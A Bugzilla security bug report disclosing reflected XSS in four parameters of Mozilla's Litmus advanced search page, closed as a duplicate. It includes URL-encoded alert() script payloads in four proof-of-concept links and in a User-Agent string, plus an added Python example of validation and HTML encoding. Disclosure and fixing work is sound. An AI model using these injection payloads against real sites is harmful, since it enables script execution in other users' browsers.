Closed
Bug 622186
Opened 14 years ago
Closed 13 years ago
Four variables vulnerable to XSS
Categories
(Webtools Graveyard :: Litmus, defect)
Webtools Graveyard
Litmus
Tracking
(Not tracked)
RESOLVED DUPLICATE of bug 613272
People
(Reporter: firealwaysworks, Unassigned)
Details
(Whiteboard: [infrasec:xss][ws:high])
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.8) Gecko/20100723 <script>alert(/xss/)</script>/9.04 (jaunty) Firefox/3.6.8
Build Identifier:

The four variables are: test_run, result_status, locale and match_criteria2

https://litmus.mozilla.org/advanced_search.cgi?testcase=15017&test_run=%27%3CScRiPt%3Ealert%28/xss/%29%3C/ScRiPt%3E

https://litmus.mozilla.org/advanced_search.cgi?result_status=%27%3CScRiPt%3Ealert%28/xss/%29%3C/ScRiPt%3E&limit=50&order_by_created=DESC&timespan=all

https://litmus.mozilla.org/advanced_search.cgi?timespan=&locale=%27%3CScRiPt%3Ealert%28/xss/%29%3C/ScRiPt%3E&vetted_only=all&trusted_only=all&test_run=195&match_criteria2=contains_any&sort_order1=ASC&opsys=39&vetted_end_date=&platform=15&sort_order2=ASC&sort_order3=ASC&sort_order4=ASC&branch=36&search_value3=&search_value2=ahoza%40softvision.ro&search_value1=20101227011409&start_date=&search_value4=&match_criteria4=contains_all&product=11&match_criteria1=contains_any&end_date=&match_criteria3=contains_all&search_field4=&search_field2=email&search_field3=&search_field1=build_id&automated=all&testgroup=&withbugs=all&result_status=pass&sort_field2=&sort_field3=&sort_field4=&valid_only=all&testcase=&limit=15&sort_field1=&vetted_start_date=&subgroup=

https://litmus.mozilla.org/advanced_search.cgi?timespan=&locale=&vetted_only=all&trusted_only=all&test_run=195&match_criteria2=%3CScRiPt%3Ealert%28/xss/%29%3C/ScRiPt%3E&sort_order1=ASC&opsys=39&vetted_end_date=&platform=15&sort_order2=ASC&sort_order3=ASC&sort_order4=ASC&branch=36&search_value3=&search_value2=ahoza%40softvision.ro&search_value1=20101227011409&start_date=&search_value4=&match_criteria4=contains_all&product=11&match_criteria1=contains_any&end_date=&match_criteria3=contains_all&search_field4=&search_field2=email&search_field3=&search_field1=build_id&automated=all&testgroup=&withbugs=all&result_status=pass&sort_field2=&sort_field3=&sort_field4=&valid_only=all&testcase=&limit=15&sort_field1=&vetted_start_date=&subgroup=

Reproducible: Always

Steps to Reproduce:
1. Click on one of the 4 links
2. alert() will be executed
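Added example, not part of the original report and not Litmus code: a Python illustration of server-side handling that neutralises the payload in the links above by validating the four named parameters and HTML-encoding them on output. The validation patterns, the `sanitize` helper and the `litmus.example` host are assumptions made for illustration.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# The four parameters named in the report.
REFLECTED = ("test_run", "result_status", "locale", "match_criteria2")

# Assumed validation rules, constructed for this example. The page only shows
# sample values (195, pass, contains_any, contains_all); the rest is a guess.
RULES = {
    "test_run": re.compile(r"\d+"),
    "result_status": re.compile(r"[a-z]+"),
    "locale": re.compile(r"[A-Za-z]{2,3}(-[A-Za-z]{2})?"),
    "match_criteria2": re.compile(r"contains_(any|all)"),
}


def sanitize(url):
    """Return {param: (accepted, html_safe_value)} for the four parameters."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    result = {}
    for name in REFLECTED:
        if name not in query:
            continue
        raw = query[name][0]  # parse_qs has already percent-decoded the value
        accepted = raw == "" or RULES[name].fullmatch(raw) is not None
        # Encode on output even when validation passes. quote=True also encodes
        # ' and ", which matters when the value is echoed into an attribute.
        result[name] = (accepted, html.escape(raw, quote=True))
    return result


# Constructed sample requests modelled on the URLs in the report.
SAMPLES = [
    "https://litmus.example/advanced_search.cgi?testcase=15017"
    "&test_run=%27%3CScRiPt%3Ealert%28/xss/%29%3C/ScRiPt%3E",
    "https://litmus.example/advanced_search.cgi?test_run=195"
    "&match_criteria2=contains_any&result_status=pass&locale=",
]

if __name__ == "__main__":
    for url in SAMPLES:
        for name, (ok, safe) in sanitize(url).items():
            print(f"{name}: {'accept' if ok else 'reject'} -> {safe}")
```

Encoding is case-insensitive by construction, so the mixed-case `ScRiPt` tag gets no special treatment and comes out as inert text.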
Updated•14 years ago
Group: websites-security → webtools-security
Component: Other → Litmus
OS: Linux → All
Product: Websites → Webtools
QA Contact: other → litmus
Hardware: x86 → All
Version: unspecified → Trunk
Updated•14 years ago
Whiteboard: [ws:need triage]
Updated•14 years ago
Whiteboard: [ws:need triage] → [infrasec:xss][ws:high]
Updated•13 years ago
Status: NEW → RESOLVED
Closed: 13 years ago
Resolution: --- → DUPLICATE
Updated•12 years ago
Group: webtools-security
Updated•8 years ago
Product: Webtools → Webtools Graveyard